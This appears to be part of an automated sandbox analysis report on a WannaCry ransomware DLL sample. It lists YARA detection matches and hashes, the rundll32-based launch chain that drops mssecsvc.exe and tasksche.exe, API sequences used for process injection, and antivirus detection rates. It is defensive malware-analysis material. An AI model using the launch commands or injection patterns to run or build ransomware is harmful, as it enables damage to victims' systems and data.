              Source: 12.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 12.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 12.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 12.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 8.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 8.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 8.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 12.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 12.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 12.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 8.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 8.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 8.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 8.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 8.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 8.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 8.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 0000001F.00000000.342404801.000000000040E000.00000008.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 00000008.00000000.265918603.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 00000008.00000000.272553493.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 0000000C.00000000.275826042.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 00000004.00000000.263399045.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 00000008.00000002.348690021.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 00000004.00000000.261795649.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 00000008.00000000.268327554.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 00000004.00000000.260345828.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 00000004.00000002.499291701.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 00000004.00000000.264801473.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 0000000C.00000002.351059064.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 00000008.00000000.269636175.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\WINDOWS\mssecsvc.exeJump to behavior
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00AC3CF04_2_00AC3CF0
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00AC28C84_2_00AC28C8
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00AC3CC24_2_00AC3CC2
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00AC3C3D4_2_00AC3C3D
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00AC3D364_2_00AC3D36
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00AC3D1F4_2_00AC3D1F
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00AC3D4B4_2_00AC3D4B
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA3CF04_2_7FEA3CF0
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA28C84_2_7FEA28C8
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA3CC24_2_7FEA3CC2
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA4C9E4_2_7FEA4C9E
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA3D4B4_2_7FEA3D4B
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA3C3D4_2_7FEA3C3D
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA3D364_2_7FEA3D36
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA3D1F4_2_7FEA3D1F
              Source: C:\Windows\tasksche.exeCode function: 31_2_00406C4031_2_00406C40
              Source: C:\Windows\tasksche.exeCode function: 31_2_00402A7631_2_00402A76
              Source: C:\Windows\tasksche.exeCode function: 31_2_00402E7E31_2_00402E7E
              Source: C:\Windows\tasksche.exeCode function: 31_2_0040350F31_2_0040350F
              Source: C:\Windows\tasksche.exeCode function: 31_2_00404C1931_2_00404C19
              Source: C:\Windows\tasksche.exeCode function: 31_2_0040541F31_2_0040541F
              Source: C:\Windows\tasksche.exeCode function: 31_2_0040379731_2_00403797
              Source: C:\Windows\tasksche.exeCode function: 31_2_004043B731_2_004043B7
              Source: C:\Windows\tasksche.exeCode function: 31_2_004031BC31_2_004031BC
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00AC05F2 FindCloseChangeNotification,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,FindCloseChangeNotification,FindCloseChangeNotification,4_2_00AC05F2
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00AC042D GetModuleHandleA,GetVersion,VirtualAlloc,FindCloseChangeNotification,SetProcessAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,FindCloseChangeNotification,4_2_00AC042D
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00AC252F NtOpenSection,4_2_00AC252F
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00AC2574 NtMapViewOfSection,FindCloseChangeNotification,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,4_2_00AC2574
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00AC2477 NtCreateFile,NtCreateFile,NtCreateFile,NtProtectVirtualMemory,NtWriteVirtualMemory,4_2_00AC2477
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00AC144A LookupPrivilegeValueA,NtAdjustPrivilegesToken,4_2_00AC144A
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00AC24AE lstrcpyW,lstrlenW,NtCreateSection,4_2_00AC24AE
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00AC33E0 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,4_2_00AC33E0
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00AC1422 LookupPrivilegeValueA,NtAdjustPrivilegesToken,4_2_00AC1422
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00AC3405 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,4_2_00AC3405
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA33E0 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,4_2_7FEA33E0
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA05F2 CloseHandle,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,CloseHandle,4_2_7FEA05F2
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA24AE lstrcpyW,lstrlenW,NtCreateSection,4_2_7FEA24AE
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA2477 NtCreateFile,NtCreateFile,NtCreateFile,NtProtectVirtualMemory,NtWriteVirtualMemory,4_2_7FEA2477
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA2574 NtMapViewOfSection,CloseHandle,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,4_2_7FEA2574
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA144A LookupPrivilegeValueA,NtAdjustPrivilegesToken,4_2_7FEA144A
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA252F NtOpenSection,4_2_7FEA252F
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA042D GetModuleHandleA,GetVersion,VirtualAlloc,CloseHandle,SetProcessAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,4_2_7FEA042D
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA1422 LookupPrivilegeValueA,NtAdjustPrivilegesToken,4_2_7FEA1422
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA3405 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,4_2_7FEA3405
              Source: mssecsvc.exe.2.drStatic PE information: Resource name: R type: PE32 executable (GUI) Intel 80386, for MS Windows
              Source: tasksche.exe.8.drStatic PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract
              Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dllJump to behavior
              Source: Joe Sandbox ViewDropped File: C:\Windows\tasksche.exe F60F8A6BCAF1384A0D6A76D3E88007A8604560B263D2B8AEEE06FD74C9EE5B3B
              Source: y2jb4FtSNq.dllVirustotal: Detection: 84%
              Source: y2jb4FtSNq.dllMetadefender: Detection: 77%
              Source: y2jb4FtSNq.dllReversingLabs: Detection: 92%
              Source: y2jb4FtSNq.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\y2jb4FtSNq.dll"
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\y2jb4FtSNq.dll",#1
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\y2jb4FtSNq.dll,PlayGame
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2jb4FtSNq.dll",#1
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exe
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2jb4FtSNq.dll",PlayGame
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exe
              Source: unknownProcess created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exe -m security
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
              Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
              Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
              Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\backgroundTaskHost.exe "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
              Source: C:\Windows\mssecsvc.exeProcess created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /i
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\y2jb4FtSNq.dll",#1Jump to behavior
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\y2jb4FtSNq.dll,PlayGameJump to behavior
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2jb4FtSNq.dll",PlayGameJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2jb4FtSNq.dll",#1Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exeJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exeJump to behavior
              Source: C:\Windows\mssecsvc.exeProcess created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /iJump to behavior
              Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\mssecsvc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\280815\1658565894Jump to behavior
              Source: mssecsvc.exe.2.drBinary string: C\Device\HarddiskVolume2\Windows\SoftwareDistribution\DataStore\Logs
              Source: mssecsvc.exe.2.drBinary string: @\Device\HarddiskVolume2\Windows\System32\ru-RU\WinSATAPI.dll.mui
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\dmvsc.sysT
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\parvdm.sysAUH
              Source: mssecsvc.exe.2.drBinary string: 2\Device\HarddiskVolume2\Windows\System32\fveui.dll
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\wercplsupport.dll
              Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\QAGENTRT.DLL
              Source: mssecsvc.exe.2.drBinary string: I\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\Locationp
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\crcdisk.sysp
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\dmvsc.sysd
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\NV_AGP.SYS
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\acpipmi.sysH
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\ndiscap.sys
              Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\cabinet.dll
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5ABCO
              Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\VMBusHID.sys&
              Source: mssecsvc.exe.2.drBinary string: h\Device\HarddiskVolume2\Users\
              Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\System32\mapi32.dll
